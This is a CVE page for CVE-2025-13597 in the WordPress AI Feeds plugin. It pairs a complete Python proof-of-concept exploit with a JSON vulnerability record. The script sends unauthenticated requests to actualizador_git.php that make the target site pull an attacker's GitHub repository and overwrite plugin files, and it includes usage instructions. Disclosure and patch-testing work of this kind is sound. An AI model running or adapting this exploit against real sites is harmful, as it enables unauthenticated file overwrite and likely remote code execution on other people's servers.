CVE-2025-13597

# CVE-2025-13597 PoC - WordPress AI Feeds Plugin Arbitrary File Upload # Target: WordPress site with AI Feeds plugin <= 1.0.11 # Attack: Upload malicious file via actualizador_git.php import requests import argparse def exploit(target_url, github_repo): """ Exploit the arbitrary file upload vulnerability in AI Feeds plugin. Args: target_url: Base URL of the vulnerable WordPress site github_repo: GitHub repository URL containing malicious payload """ # Construct the vulnerable endpoint endpoint = f"{target_url}/wp-content/plugins/ai-feeds/actualizador_git.php" # Parameters for the exploit params = { 'repo': github_repo, # Attacker's GitHub repo with malicious files 'branch': 'main' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting endpoint: {endpoint}") print(f"[*] Using GitHub repo: {github_repo}") try: # Send the exploit request response = requests.get(endpoint, params=params, timeout=30) if response.status_code == 200: print("[+] Request successful - files may have been uploaded") print(f"[*] Response: {response.text[:500]}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error: {e}") def main(): parser = argparse.ArgumentParser(description='CVE-2025-13597 Exploit') parser.add_argument('-t', '--target', required=True, help='Target WordPress URL') parser.add_argument('-r', '--repo', required=True, help='GitHub repo with malicious files') args = parser.parse_args() exploit(args.target, args.repo) if __name__ == '__main__': main() # Usage: # python cve-2025-13597.py -t http://target.com -r https://github.com/attacker/malicious-repo

{"cve": {"id": "CVE-2025-13597", "sourceIdentifier": "[email protected]", "published": "2025-11-25T23:15:47.377", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AI Feeds plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check in the 'actualizador_git.php' file in all versions up to, and including, 1.0.11. This makes it possible for unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-13597", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ai-feeds/trunk/actualizador_git.php#L1", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3402321/ai-feeds", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-13597", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c5007dd0-a62c-4ad8-8f8b-eb3f4387c370?source=cve", "source": "[email protected]"}]}}